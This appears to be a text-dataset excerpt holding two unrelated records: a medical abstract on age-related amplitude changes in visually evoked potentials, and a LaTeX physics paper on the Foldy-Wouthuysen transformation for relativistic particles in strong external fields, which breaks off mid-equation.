text
stringlengths
8
5.77M
Visually evoked potentials: amplitude changes with age. Visually evoked potentials of 215 subjects, aged 1 month to 81 years, were studied. Amplitudes of waves in the first 250 milliseconds of the response changed markedly with age. In responses recorded from the occiput, there was a rapid increase in amplitude reaching a maximum in the 5- to 6-year-old group, with means of amplitudes at this age being about twice as large as means of some older age groups. With children 7 years and older there was a rapid decline in amplitude until ages 13 to 14, when an abrupt increase in amplitude appeared. Amplitude appeared to stabilize at about age 16. In older subjects, mean age 60 and beyond, significant changes were noted in the earlier components of the response.
--- abstract: 'A general method of the Foldy-Wouthyusen (FW) transformation for relativistic particles of arbitrary spin in strong external fields has been developed. The use of the found transformation operator is not restricted by any definite commutation relations between even and odd operators. The final FW Hamiltonian can be expanded into a power series in the Planck constant which characterizes the order of magnitude of quantum corrections. Exact expressions for low-order terms in the Planck constant can be derived. Finding these expressions allows to perform a simple transition to the semiclassical approximation which defines a classical limit of the relativistic quantum mechanics. As an example, interactions of spin-1/2 and scalar particles with a strong electromagnetic field have been considered. Quantum and semiclassical equations of motion of particles and their spins have been deduced. Full agreement between quantum and classical theories has been established.' author: -   title: 'Foldy-Wouthyusen Transformation and Semiclassical Limit for Relativistic Particles in Strong External Fields' --- Introduction ============ The Foldy-Wouthuysen (FW) representation [@FW] occupies a special place in the quantum theory. Properties of this representation are unique. The Hamiltonian and all operators are block-diagonal (diagonal in two spinors). Relations between the operators in the FW representation are similar to those between the respective classical quantities. For relativistic particles in external fields, operators have the same form as in the nonrelativistic quantum theory. For example, the position operator is $\bm r$ and the momentum one is $\bm p=-i\hbar\nabla$. These properties considerably simplify the transition to the semiclassical description. As a result, the FW representation provides the best possibility of obtaining a meaningful classical limit of the relativistic quantum mechanics. The basic advantages of the FW representation are described in Refs. [@FW; @CMcK; @JMP]. Interactions of relativistic particles with strong external fields can be considered on three levels: (i) classical physics, (ii) relativistic quantum mechanics, and (iii) quantum field theory. The investigation of such interactions on every level is necessary. The use of the FW representation allows to describe strong-field effects on level (ii) and to find a unambiguous connection between classical physics and relativistic quantum mechanics. To solve the problem, one should carry out an appropriate FW transformation (transformation to the FW representation). The deduced Hamiltonian should be exact up to first-order terms in the Planck constant $\hbar$. This precision is necessary for establishment of exact connection between the classical physics and the relativistic quantum mechanics. However, known methods of exact FW transformation either can be used only for some definite classes of initial Hamiltonians in the Dirac representation [@Nikitin; @JMP] or need too cumbersome derivations [@E]. In the present work, new general method of the FW transformation for relativistic particles in strong external fields is proposed. This method gives exact expressions for low-order terms in $\hbar$. The proposed method is based on the developments performed in Ref. [@JMP] and can be utilized for particles of arbitrary spin. Any definite commutation relations between even and odd operators in the initial Hamiltonian are not needed. An expansion of the FW Hamiltonian into a power series in the Planck constant is used. Since just this constant defines the order of magnitude of quantum corrections, the transition to the semiclassical approximation becomes trivial. As an example, interaction of scalar and spin-1/2 particles with a strong electromagnetic field is considered. We use the designations $[\dots,\dots]$ and $\{\dots,\dots\}$ for commutators and anticommutators, respectively. Foldy-Wouthyusen transformation for particles in external fields ================================================================ In this section, we review previously developed methods of the FW transformation for particles in external fields. The relativistic quantum mechanics is based on the Klein-Gordon equation for scalar particles, the Dirac equation for spin-1/2 particles, and corresponding relativistic wave equations for particles with higher spins (see, e.g., Ref. [@FN]). The quantum field theory is not based on these fundamental equations of the relativistic quantum mechanics (see Ref. [@W]). Relativistic wave equations for particles with any spin can be presented in the Hamilton form. In this case, the Hamilton operator acts on the bispinor wave function $\Psi=\left(\begin{array}{c} \phi \\ \chi \end{array}\right)$: $$i\hbar\frac{\partial\Psi}{\partial t}={\cal H}\Psi. \label{eqi}$$ A particular case of Eq. (\[eqi\]) is the Dirac equation. We can introduce the unit matrix $I$ and the Pauli matrices those components act on the spinors: $$I=\left(\begin{array}{cc}1&0\\0&1\end{array}\right), ~~~\rho_1=\left(\begin{array}{cc}0&1\\1&0\end{array}\right), ~~~ \rho_2=\left(\begin{array}{cc}0&-i\\i&0\end{array}\right), ~~~ \rho_3\equiv\beta=\left(\begin{array}{cc}1&0\\0&-1\end{array}\right).$$ The Hamiltonian can be split into operators commuting and noncommuting with the operator $\beta$: $${\cal H}=\beta {\cal M}+{\cal E}+{\cal O},~~~\beta{\cal M}={\cal M}\beta, ~~~\beta{\cal E}={\cal E}\beta, ~~~\beta{\cal O}=-{\cal O}\beta, \label{eq3}$$ where the operators ${\cal M}$ and ${\cal E}$ are even and the operator ${\cal O}$ is odd. We suppose that the operator ${\cal E}$ is multiplied by the unit matrix $I$ which is everywhere omitted. Explicit form of the Hamilton operators for particles with arbitrary half-integer spin has been obtained in Ref. [@NGNN]. Similar equations have been derived for spin-0 [@FV] and spin-1 [@CS; @YB] particles. To study semiclassical limits of these equations, one should perform appropriate FW transformations. The wave function of a spin-1/2 particle can be transformed to a new representation with the unitary operator $U$: $$\Psi'=U\Psi.$$ The Hamilton operator in the new representation takes the form [@FW; @JMP; @Gol] $${\cal H}'=U{\cal H}U^{-1}-i\hbar U\frac{ \partial U^{-1}}{\partial t}, \label{eq2}$$ or $${\cal H}'=U\left({\cal H}-i\hbar\frac{\partial}{\partial t}\right)U^{-1}+ i\hbar\frac{\partial}{\partial t}.$$ The FW transformation has been justified in the best way. In the classical work by Foldy and Wouthuysen [@FW], the exact transformation for free relativistic particles and the approximate transformation for nonrelativistic particles in electromagnetic fields have been carried out. There exist several other nonrelativistic transformation methods which give the same results (see Ref. [@JMP] and references therein). A few methods can be applied for relativistic particles in external fields. However, the transformation methods explained in Refs. [@B; @GS] require cumbersome calculations. The block-diagonalization of two-body Hamiltonians for a system of two spin-1/2 particles and a system of spin-0 and spin-1/2 particles can be performed by the methods found by Chraplyvy [@Chraplyvy] and Tanaka *et al* [@Tanaka], respectively. Some methods allow to reach the FW representation without the use of unitary transformations. The so-called elimination method [@Pa] makes it possible to exclude the lower spinor from relativistic wave equations. Variants of this method useful for relativistic particles have been elaborated in Refs. [@Neznamov; @STMP]. Another method which essentially differs from the FW and elimination methods has been presented in Ref. [@Gos]. This method defines a diagonalization procedure based on a formal expansion in powers of the Planck constant $\hbar$ and can be used for a large class of Hamiltonians directly inducing Berry phase corrections [@Gos]. An important feature of this method is a possibility to take into account strong-field effects. Any method different from the FW one should also be justified. The validity of the elimination method is proved only by the coincidence of results obtained by this method and the FW one [@VJ]. Impressive agreement between results presented in Ref. [@Gos] and corresponding results obtained by the FW method is reached for first-order terms in $\hbar$. These terms define momentum and spin dynamics that can be well described in the framework of classical physics. To prove the validity of the method, one should show such an agreement for terms derived from second-order commutators (e.g., for the Darwin term [@FW]). Therefore, we desist from a definitive estimate of the method developed in Ref. [@Gos]. We suppose the consistence with the genuine FW transformation to be necessary for any diagonalization method. For example, the Eriksen-Korlsrud method [@EK] does not transform the wave function to the FW representation even for free particles [@PRD]. The use of this method in Refs. [@Obukhov; @Heidenreich] instead of the FW one could cause a misunderstanding of the nature of spin-gravity coupling (see the discussion in Refs. [@PRD; @Mashhoon2]). In the general case, the exact FW transformation has been found by Eriksen [@E]. The validity of the Eriksen transformation has also been argued by de Vries and Jonker [@VJ]. The Eriksen transformation operator has the form [@E] $$U=\frac12(1+\beta\lambda)\left[1+\frac14(\beta\lambda+\lambda\beta-2)\right]^{-1/2}, ~~~ \lambda=\frac{{\cal H}}{({\cal H}^2)^{1/2}}, \label{E}$$ where ${\cal H}$ is the Hamiltonian in the Dirac representation. This operator brings the Dirac wave function and the Dirac Hamiltonian to the FW representation in one step. However, it is difficult to use the Eriksen method for obtaining an explicit form of the relativistic FW Hamiltonian because the general final formula is very cumbersome and contains roots of Dirac matrix operators. Therefore, the Eriksen method was not used for relativistic particles in external fields. To perform the FW transformation in the strong external fields, we develop the much simpler method elaborated in Ref. [@JMP] for relativistic spin-1/2 particles. In this work, the initial Dirac Hamiltonian is given by $${\cal H}=\beta m+{\cal E}+{\cal O}, \label{eq3N}$$ where $m$ is the particle mass. In Eqs. (\[eq3N\])–(\[eq31\]), the system of units $\hbar=c=1$ is used. When $[{\cal E},{\cal O}]=0$, the FW transformation is exact [@JMP]. This transformation is fulfilled with the operator $$U=\frac{\epsilon+m+\beta{\cal O}}{\sqrt{2\epsilon(\epsilon+m)}}, ~~~\epsilon=\sqrt{m^2+{\cal O}^2} \label{eq18}$$ and the transformed Hamiltonian takes the form $${\cal H}_{FW}=\beta \epsilon+{\cal E}. \label{eq17}$$ The same transformation is valid for Hamiltonian (\[eq3\]) when not only does the operator ${\cal E}$ commutates with ${\cal O}$ but also the operator ${\cal M}$: $$[{\cal M},{\cal O}]=0. \label{comm}$$ In this case, Eq. (\[eq17\]) remains valid but the operator $\epsilon$ takes the form $$\epsilon=\sqrt{{\cal M}^2+{\cal O}^2}.$$ In the general case, the FW Hamiltonian has been obtained as a power series in external field potentials and their derivatives [@JMP]. As a result of the first stage of transformation performed with operator (\[eq18\]), the following Hamiltonian can be found: $${\cal H}'=\beta\epsilon+{\cal E}'+{\cal O}',~~~\beta{\cal E}'={\cal E}'\beta, ~~~\beta{\cal O}'=-{\cal O}'\beta. \label{eq7}$$ The odd operator ${\cal O}'$ is now comparatively small: $$\begin{array}{c} \epsilon=\sqrt{m^2+{\cal O}^2}, \\ {\cal E}'=i\frac{\partial}{\partial t}+\frac{\epsilon+m} {\sqrt{2\epsilon(\epsilon+m)}}\left({\cal E}-i\frac{\partial}{\partial t} \right)\frac{\epsilon+m}{\sqrt{2\epsilon(\epsilon+m)}}\\-\frac{\beta{\cal O}} {\sqrt{2\epsilon(\epsilon+m)}}\left({\cal E}-i\frac{\partial}{\partial t} \right)\frac{\beta{\cal O}}{\sqrt{2\epsilon(\epsilon+m)}}, \\ {\cal O}'=\frac{\beta{\cal O}}{\sqrt{2\epsilon(\epsilon+m)}} \left({\cal E}-i\frac{\partial}{\partial t} \right)\frac{\epsilon+m}{\sqrt{2\epsilon(\epsilon+m)}}\\- \frac{\epsilon+m}{\sqrt{2\epsilon(\epsilon+m)}}\left({\cal E}-i\frac{\partial} {\partial t}\right)\frac{\beta{\cal O}}{\sqrt{2\epsilon(\epsilon+m)}}. \end{array} \label{eq28}$$ The second stage of transformation leads to the approximate equation for the FW Hamiltonian: $${\cal H}_{FW}=\beta\epsilon+{\cal E}'+\frac14\beta\left\{{\cal O}'^2,\frac{1}{\epsilon}\right\}. \label{eq31}$$ To reach a better precision, additional transformations can be used [@JMP]. This method has been applied for deriving the Hamiltonian and the quantum mechanical equations of momentum and spin motion for Dirac particles interacting with electroweak [@JMP] and gravitational [@PRD; @PRD2] fields. The semiclassical limit of these equations has been obtained [@JMP; @PRD; @PRD2]. To determine the exact classical limit of the relativistic quantum mechanics of arbitrary-spin particles in *strong* external fields, we need to generalize the method. General properties of the Hamiltonian depend on the particle spin. The Hamiltonian is hermitian (${\cal H}={\cal H}^\dagger$) for spin-1/2 particles and pseudo-hermitian for spin-0 and spin-1 ones (more precisely, $\beta$-pseudo-hermitian, see Ref. [@Mostafazadeh] and references therein). In the latter case, it possesses the property ($\beta^{-1}=\beta$) $${\cal H}^\dagger=\beta{\cal H}\beta$$ that is equivalent to $${\cal H}^\ddagger\equiv\beta{\cal H}^\dagger\beta={\cal H}.$$ The normalization of wave functions is given by $$\int{\Psi^\dagger\Psi dV}=\int{(\phi\phi^\ast+\chi\chi^\ast) dV}=1$$ for spin-1/2 particles and $$\int{\Psi^\ddagger\Psi dV}\equiv\int{\Psi^\dagger\beta\Psi dV}=\int{(\phi\phi^\ast-\chi\chi^\ast) dV}=1$$ for spin-0 and spin-1 particles. We suppose ${\cal M}={\cal M}^\dagger,~{\cal E}={\cal E}^\dagger,~{\cal O}={\cal O}^\dagger$ when ${\cal H}={\cal H}^\dagger$ and ${\cal M}={\cal M}^\ddagger,~{\cal E}={\cal E}^\ddagger,~{\cal O}={\cal O}^\ddagger$ when ${\cal H}={\cal H}^\ddagger$. These conditions can be satisfied in any case. Since the FW Hamiltonian is block-diagonal and a lower spinor describes negative-energy states, this spinor should be equal to zero. The FW transformation should be performed with the unitary operator $U^\dagger =U^{-1}$ for spin-1/2 particles and with the pseudo-unitary operator $U^\ddagger\equiv\beta U^\dagger\beta =U^{-1}$ for spin-0 and spin-1 particles. FOLDY-WOUTHYUSEN TRANSFORMATION IN STRONG EXTERNAL FIELDS ========================================================= We propose the method of the FW transformation for relativistic particles in strong external fields which can be used for particles of arbitrary spin. The FW Hamiltonian can be expanded into a power series in the Planck constant which defines the order of magnitude of quantum corrections. The obtained expressions for low-order terms in $\hbar$ are exact. The proposed FW transformation makes the transition to the semiclassical approximation to be trivial. The power expansion can be available only if $$pl\gg\hbar, \label{rel1}$$ where $p$ is the momentum of the particle and $l$ is the characteristic size of the nonuniformity region of the external field. This relation is equivalent to $$\lambda\ll l, \label{rel2}$$ where $\lambda$ is the de Broglie wavelength. Eqs. (\[rel1\]),(\[rel2\]) result from the fact that the Planck constant appears in the final Hamiltonian due to commutators between the operators ${\cal M},{\cal E}$, and ${\cal O}$. The expansion of the FW Hamiltonian into the power series in the Planck constant is formally similar to the previously obtained expansion [@JMP] into a power series in the external field potentials and their derivatives. However, the equations derived in Ref. [@JMP] do not define the semiclassical limit of the Dirac equation for particles in strong external fields, while these equations exhaustively describe the weak-field expansion. The proposed method can also be used in the weak-field expansion even when relations (\[rel1\]),(\[rel2\]) are not valid. When the power series in the Planck constant is deduced, zero power terms define the quantum analogue of the classical Hamiltonian. On this level, classical and quantum expressions should be very similar because the classical theory gives the right limit of the quantum theory. Terms proportional to powers of $\hbar$ may describe quantum corrections. As a rule, interactions described by these terms also exist in the classical theory. However, classical expressions may differ from the corresponding quantum ones because the quantum corrections to the classical theory may appear. We generalize the method developed in Ref. [@JMP] in order to take into account a possible non-commutativity of the operators ${\cal M}$ and ${\cal O}$. The natural generalization of transformation operator (\[eq18\]) used in Ref. [@JMP] is $$U=\frac{\beta\epsilon+\beta {\cal M}-{\cal O}}{\sqrt{(\beta\epsilon+\beta {\cal M}-{\cal O})^2}}\,\beta,~~~ U^{-1}=\beta\,\frac{\beta\epsilon+\beta{\cal M}-{\cal O}}{\sqrt{(\beta\epsilon+\beta{\cal M}-{\cal O})^2}}, \label{eq18N}$$ where $U^\dagger=U^{-1}$ when ${\cal H}={\cal H}^\dagger$ and $U^\ddagger=U^{-1}$ when ${\cal H}={\cal H}^\ddagger$. This form of the transformation operator allows to perform the FW transformation in the general case. The special case ${\cal M}=mc^2$ has been considered in Ref. [@JMP] and commutation relation (\[comm\]) has been used in Refs. [@PRD; @JETP]. We consider the general case when external fields are nonstationary. The exact formula for the transformed Hamiltonian has the form $$\begin{array}{c} {\cal H}'=\beta\epsilon+{\cal E}+ \frac{1}{2T}\Biggl(\left[T,\left[T,(\beta\epsilon+{\cal F})\right]\right] +\beta\left[{\cal O},[{\cal O},{\cal M}]\right]\\- \left[{\cal O},\left[{\cal O},{\cal F}\right]\right] - \left[(\epsilon+{\cal M}),\left[(\epsilon+{\cal M}),{\cal F}\right]\right] - \left[(\epsilon+{\cal M}),\left[{\cal M},{\cal O}\right]\right]\\-\beta \left\{{\cal O},\left[(\epsilon+{\cal M}),{\cal F}\right]\right\}+\beta \left\{(\epsilon+{\cal M}),\left[{\cal O},{\cal F}\right]\right\} \Biggr)\frac{1}{T}, \end{array} \label{eq28N}$$ where ${\cal F}={\cal E}-i\hbar\frac{\partial}{\partial t}$ and $T=\sqrt{(\beta\epsilon+\beta{\cal M}-{\cal O})^2}$. Hamiltonian (\[eq28N\]) still contains odd terms proportional to the first and higher powers of the Planck constant. This Hamiltonian can be presented in the form $${\cal H}'=\beta\epsilon+{\cal E}'+{\cal O}',~~~\beta{\cal E}'={\cal E}'\beta, ~~~\beta{\cal O}'=-{\cal O}'\beta, \label{eq27}$$ where $\epsilon=\sqrt{{\cal M}^2+{\cal O}^2}.$ The even and odd parts of Hamiltonian (\[eq27\]) are defined by the well-known relations: $${\cal E}'=\frac12\left({\cal H}'+\beta{\cal H}'\beta\right)-\beta\epsilon,~~~ {\cal O}'=\frac12\left({\cal H}'-\beta{\cal H}'\beta\right).$$ Additional transformations performed according to Ref. [@JMP] bring ${\cal H}'$ to the block-diagonal form. The approximate formula for the final FW Hamiltonian is $${\cal H}_{FW}=\beta\epsilon+{\cal E}'+\frac14\beta\left\{{\cal O}'^2,\frac{1}{\epsilon}\right\}. \label{eqf}$$ This formula is similar to the corresponding one obtained in Ref. [@JMP]. The additional transformations allow to obtain more precise expression for the FW Hamiltonian. Eqs. (\[eq28N\])–(\[eqf\]) solve the problem of the FW transformation for relativistic particles of arbitrary spin in strong external fields. Eq. (\[eq28N\]) can be significantly simplified in some special cases. When $[{\cal M},{\cal O}]=0$ and the external fields are stationary, it is reduced to $$\begin{array}{c} {\cal H}'=\beta\epsilon+{\cal E}+ \frac{1}{2T}\Biggl(\left[T,\left[T,{\cal E}\right]\right] \\- \left[{\cal O},\left[{\cal O},{\cal E}\right]\right] - \left[(\epsilon+{\cal M}),\left[(\epsilon+{\cal M}),{\cal E}\right]\right] \\-\beta \left\{{\cal O},\left[(\epsilon+{\cal M}),{\cal E}\right]\right\}+\beta \left\{(\epsilon+{\cal M}),\left[{\cal O},{\cal E}\right]\right\} \Biggr)\frac{1}{T}. \end{array} \label{eqrd}$$ In this case, $[\epsilon,{\cal M}]=[\epsilon,{\cal O}]=0$ and the operator $T=\sqrt{2\epsilon(\epsilon+{\cal M})}$ is even. SPIN-1/2 AND SCALAR PARTICLES IN STRONG ELECTROMAGNETIC FIELD ============================================================= As an example, the FW transformation for spin-1/2 and scalar particles interacting with a strong electromagnetic field can be considered. The initial Dirac-Pauli Hamiltonian for a particle possessing an anomalous magnetic moment (AMM) has the form [@P] $$\begin{array}{c} {\cal H}_{DP}=c\bm{\alpha}\cdot\bm{\pi}+\beta mc^2+e\Phi+\mu'(-\bm {\Pi}\cdot \bm{H}+i\bm{\gamma}\cdot\bm{ E}),\\ \bm{\pi}=\bm{p}-\frac{e}{c}\bm{ A}, ~~~ \mu'=\frac{g-2}{2}\cdot\frac{e\hbar}{2mc}, \end{array} \label{eqDP}$$ where $\mu'$ is the AMM, $\Phi,\bm{ A}$ and $\bm{ E},\bm{H}$ are the potentials and strengths of the electromagnetic field. Here and below the following designations for the matrices are used: $$\begin{array}{c}\bm{\gamma}=\left(\begin{array}{cc} 0 & \bm{\sigma} \\ -\bm{\sigma} & 0 \end{array}\right), ~~~ {\beta}\equiv\gamma^0=\left(\begin{array}{cc} 1 & 0 \\ 0 & -1 \end{array}\right), ~~~\bm{\alpha}=\beta\bm\gamma= \left(\begin{array}{cc} 0 & \bm{\sigma} \\ \bm{\sigma} & 0 \end{array}\right), \\ \bm{\Sigma} =\left(\begin{array}{cc} \bm{\sigma} & 0 \\ 0 & \bm{\sigma}\end{array}\right), ~~~\bm{\Pi}=\beta\bm\Sigma =\left(\begin{array}{cc} \bm{\sigma} & 0 \\ 0 & -\bm{\sigma}\end{array}\right), \end{array}$$ where $0,1,-1$ mean the corresponding 2$\times$2 matrices and $\bm{\sigma}$ is the Pauli matrix. Terms describing the electric dipole moment (EDM) $d$ have been added in Ref. [@RPJ]. The resulting Hamiltonian is given by $$\begin{array}{c} {\cal H}=c\bm{\alpha}\cdot\bm{\pi}+\beta mc^2+e\Phi+\mu'(-\bm {\Pi}\cdot \bm{H}+i\bm{\gamma}\cdot\bm{ E}) %\\ -d(\bm {\Pi}\cdot \bm{E}+i\bm{\gamma}\cdot\bm{ H}), ~~~ d=\frac{\eta}{2}\cdot\frac{e\hbar}{2mc}, \end{array} \label{eqEDM}$$ where $\eta$ factor for the EDM is an analogue of $g$ factor for the magnetic moment. It is important that $\mu'$ and $d$ are proportional to $\hbar$. In the considered case $$\begin{array}{c} {\cal M}=mc^2,~~~ {\cal E}=e\Phi-\mu'\bm {\Pi}\cdot \bm{H}-d\bm {\Pi}\cdot \bm{E}, ~~~%\\ {\cal O}=c\bm{\alpha}\cdot\bm{\pi}+i\mu'\bm{\gamma}\cdot\bm{ E}-id\bm{\gamma}\cdot\bm{ H}. \end{array}$$ Since only terms of zero and first powers in the Planck constant define the semiclassical equations of motion of particles and their spins, we retain only such terms in the FW Hamiltonian. The terms of order of $\hbar$ are proportional either to field gradients or to products of field strengths ($H^2,~E^2$ and $EH$). We do not calculate the terms proportional to products of field strengths because they are usually small in comparison with the terms proportional to field gradients. The calculated Hamiltonian is given by $$\begin{array}{c} {\cal H}_{FW}=\beta\epsilon'+e\Phi- \mu'\bm\Pi\cdot\bm H-\frac{\mu_0}{2}\left\{\frac{mc^2}{\epsilon'}, \bm\Pi\cdot\bm H\right\}\\+\frac{\mu'c}{4}\left\{\frac{1}{\epsilon'}, \left[\bm\Sigma\cdot(\bm \pi\times \bm E)-\bm\Sigma\cdot(\bm E\times \bm\pi) \right]\right\}\\+ \frac{\mu_0mc^3}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\left[\bm\Sigma\cdot(\bm \pi\times \bm E)-\bm\Sigma\cdot(\bm E\times \bm\pi) \right]\frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\\+ \frac{\mu'c^2}{2\sqrt{2\epsilon'(\epsilon'+mc^2)}}\left\{(\bm{\Pi}\cdot\bm\pi), (\bm{H}\cdot\bm\pi+\bm{\pi}\cdot\bm H)\right\}\frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\\ -d\bm\Pi\cdot\bm E %\\ +\frac{dc^2}{2\sqrt{2\epsilon'(\epsilon'+mc^2)}}\left\{(\bm{\Pi}\cdot\bm\pi), (\bm{E}\cdot\bm\pi+\bm{\pi}\cdot\bm E)\right\}\frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\\ -\frac{dc}{4}\left\{\frac{1}{\epsilon'}, \left[\bm\Sigma\cdot(\bm \pi\times \bm H)-\bm\Sigma\cdot(\bm H\times \bm\pi) \right]\right\}, \end{array} \label{eq33}$$ where $$\epsilon'=\sqrt{m^2c^4+c^2\bm{\pi}^2} \label{eq34}$$ and $\mu_0=\frac{e\hbar}{2mc}$ is the Dirac magnetic moment. The quantum evolution of the kinetic momentum operator, $\bm\pi$, is defined by the operator equation of particle motion: $$\frac{d\bm\pi}{dt}=\frac{i}{\hbar}[{\cal H}_{FW},\bm\pi] -\frac{e}{c}\cdot\frac{\partial\bm A}{\partial t}. \label{eqme}$$ The equation of spin motion describes the evolution of the polarization operator $\bm\Pi$: $$\frac{d\bm\Pi}{dt}=\frac{i}{\hbar}[{\cal H}_{FW},\bm\Pi]. \label{eqpoe}$$ Because the operator $\bm\pi$ does not contain the Dirac spin matrices, the commutator of this operator with the Hamiltonian is proportional to $\hbar$. The equation of spin-1/2 particle motion in the strong electromagnetic field to within first-order terms in the Planck constant has the form $$\begin{array}{c} \frac{d\bm \pi}{dt}=e\bm E+\beta\frac{ec}{4}\left\{\frac{1}{\epsilon'}, \left([\bm\pi\times\bm H]-[\bm H\times\bm\pi]\right)\right\} %\\ +\mu' \nabla(\bm\Pi\cdot\bm H)+ \frac{\mu_0}{2}\left\{\frac{mc^2}{\epsilon'}, \nabla(\bm\Pi\cdot\bm H)\right\}\\-\frac{\mu'c}{4}\left\{\frac{1}{\epsilon'}, \left[\nabla(\bm\Sigma\cdot[\bm\pi\times\bm E])- \nabla(\bm\Sigma\cdot[\bm E\times\bm\pi]) \right]\right\}\\- \frac{\mu_0mc^3}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\left[\nabla(\bm\Sigma\cdot[\bm\pi\times\bm E])- \nabla(\bm\Sigma\cdot[\bm E\times\bm\pi])\right]\frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}\\ -\frac{\mu'c^2}{2\sqrt{2\epsilon'(\epsilon'+mc^2)}}\left\{(\bm{\Pi}\cdot\bm\pi),\left[\nabla (\bm{H}\cdot\bm\pi)+\nabla(\bm{\pi}\cdot\bm H)\right]\right\} \frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}}. \end{array} \label{eq35}$$ This equation can be divided into two parts. The first part does not contain the Planck constant and describes the quantum equivalent of the Lorentz force. The second part is of order of $\hbar$. This part defines the relativistic expression for the Stern-Gerlach force. Since terms proportional to $d$ are small, they are omitted. The equation of spin motion is given by $$\begin{array}{c} \frac{d\bm{\Pi}}{dt}=2\mu'\bm\Sigma\times\bm H+\mu_0 \left\{\frac{mc^2}{\epsilon'}, \bm\Sigma\times\bm H\right\} %\\ -\frac{\mu'c}{2}\left\{\frac{1}{\epsilon'}, \left[\bm\Pi\times(\bm \pi\times \bm E)-\bm\Pi\times(\bm E\times \bm\pi) \right]\right\}\\ - \frac{\mu_0mc^3}{\sqrt{\epsilon'(\epsilon'+mc^2)}}\left[\bm\Pi\times(\bm \pi\times \bm E) -\bm\Pi\times(\bm E\times \bm\pi) \right]\frac{1}{\sqrt{\epsilon'(\epsilon'+mc^2)}}\\ - \frac{\mu'c^2}{\sqrt{2\epsilon'(\epsilon'+mc^2)}} \left\{(\bm\Sigma\times\bm \pi), (\bm{H}\cdot\bm\pi+\bm{\pi}\cdot\bm H)\right\} \frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}} \\ +2d\bm\Sigma\times\bm E %\\ -\frac{dc^2}{\sqrt{2\epsilon'(\epsilon'+mc^2)}} \left\{(\bm\Sigma\times\bm \pi), (\bm{E}\cdot\bm\pi+\bm{\pi}\cdot\bm E)\right\} \frac{1}{\sqrt{2\epsilon'(\epsilon'+mc^2)}} \\+\frac{dc}{2}\left\{\frac{1}{\epsilon'}, \left[\bm\Pi\times(\bm \pi\times \bm H)-\bm\Pi\times(\bm H\times \bm\pi) \right]\right\}. \end{array} \label{eq36}$$ Eqs. (\[eq33\]),(\[eq35\]),(\[eq36\]) agree with the corresponding equations derived in Refs. [@JMP; @RPJ]. However, unlike the latter equations, Eqs. (\[eq33\]),(\[eq35\]),(\[eq36\]) describe strong-field effects. We can also consider the interaction of spinless particles with the strong electromagnetic field. The initial Klein-Gordon equation describing this interaction has been transformed to the Hamilton form in Ref. [@FV]. In this case, the Hamiltonian acts on the two-component wave function which is the analogue of the spinor. The explicit form of this Hamiltonian is [@FV] $${\cal H}=\rho_3mc^2+(\rho_3+i\rho_2)\frac{\bm\pi^2}{2m}+e\Phi. \label{FV}$$ Therefore, $${\cal M}=mc^2+\frac{\bm\pi^2}{2m}, ~~~{\cal E}=e\Phi, ~~~{\cal O}=i\rho_2\frac{\bm\pi^2}{2m}, ~~~[{\cal M},{\cal O}]=0. \label{MEO}$$ For spinless particles, $$\epsilon=\sqrt{m^2c^4+c^2\bm\pi^2}, ~~~ T=\sqrt{\frac{\epsilon}{mc^2}}\left(\epsilon+mc^2\right). \label{eqep}$$ The Hamiltonian transformed to the FW representation is given by $${\cal H}_{FW}=\beta\epsilon+{\cal E}=\beta\sqrt{m^2c^4+c^2\bm\pi^2}+e\Phi. \label{eqfz}$$ There are not any terms of order of $\hbar$ in this Hamiltonian, while it contains terms of second and higher orders in the Planck constant. We do not calculate the latter terms because their contribution into equations of particle motion is usually negligible. The operator equation of particle motion takes the form $$\begin{array}{c} \frac{d\bm \pi}{dt}=e\bm E+\beta\frac{ec}{4}\left\{\frac{1}{\epsilon}, \left([\bm\pi\times\bm H]-[\bm H\times\bm\pi]\right)\right\}. \end{array} \label{eqpz}$$ The right hand side of this equation coincides with the spin-independent part of the corresponding equation for spin-1/2 particles. Eq. (\[eqfz\]) for the FW Hamiltonian agrees with Eq. (12) in Ref. [@PAN]. In this reference, the weak-field approximation has been used and the operator equation of particle motion in the strong electromagnetic field has not been obtained. SEMICLASSICAL LIMIT OF RELATIVISTIC QUANTUM MECHANICS FOR PARTICLES IN STRONG EXTERNAL FIELDS ============================================================================================== To obtain the semiclassical limit of the relativistic quantum mechanics, one needs to average the operators in the quantum mechanical equations. When the FW representation is used and relations (\[rel1\]),(\[rel2\]) are valid, the semiclassical transition consists in trivial replacing operators by corresponding classical quantities. In this representation, the problem of extracting even parts of the operators does not appear. Therefore, the derivation of equations for particles of arbitrary spin in strong external fields made in the precedent section solves the problem of obtaining the semiclassical limit of the relativistic quantum mechanics. If the momentum and position operators are chosen to be the dynamical variables, relations (\[rel1\]),(\[rel2\]) are equivalent to the condition $$|<p_i>|\cdot|<x_i>|\gg|<[p_i,x_i]>|=\hbar,~~~ i=1,2,3. \label{rel3}$$ The angular brackets which designate averaging in time will be hereinafter omitted. Obtained semiclassical equations may differ from corresponding classical ones. As a result of replacing operators by corresponding classical quantities, the semiclassical equations of motion of particles and their spins take the form $$\begin{array}{c} \frac{d\bm \pi}{dt}=e\bm E+\frac{ec}{\epsilon'} \left(\bm\pi\times\bm H\right) %\\ +\mu'\nabla(\bm P\cdot\bm H)+ \frac{\mu_0}{mc^2\epsilon'} \nabla(\bm P\cdot\bm H)\\ -\frac{\mu'c}{\epsilon'} \nabla(\bm P\cdot[\bm\pi\times\bm E])%\\ -\frac{\mu_0mc^3}{\epsilon'(\epsilon'+mc^2)}\nabla(\bm P\cdot[\bm\pi\times\bm E])\\ -\frac{\mu'c^2}{\epsilon'(\epsilon'+mc^2)}(\bm{P}\cdot\bm\pi)\nabla (\bm{H}\cdot\bm\pi), ~~~~~~~ \bm P=\frac{\bm S}{S}, \end{array} \label{eqw}$$ $$\begin{array}{c} \frac{d\bm P}{dt}=2\mu'\bm P\times\bm H+ \frac{2\mu_0mc^2}{\epsilon'}( \bm P\times\bm H)%\\ -\frac{2\mu'c}{\epsilon'} \left(\bm P\times[\bm \pi\times \bm E]\right)\\ -\frac{2\mu_0mc^3}{\epsilon'(\epsilon'+mc^2)}\left(\bm P\times[\bm \pi\times \bm E] \right) %\\ -\frac{2\mu'c^2}{\epsilon'(\epsilon'+mc^2)} (\bm P\times\bm \pi)(\bm{\pi}\cdot\bm H)\\ % 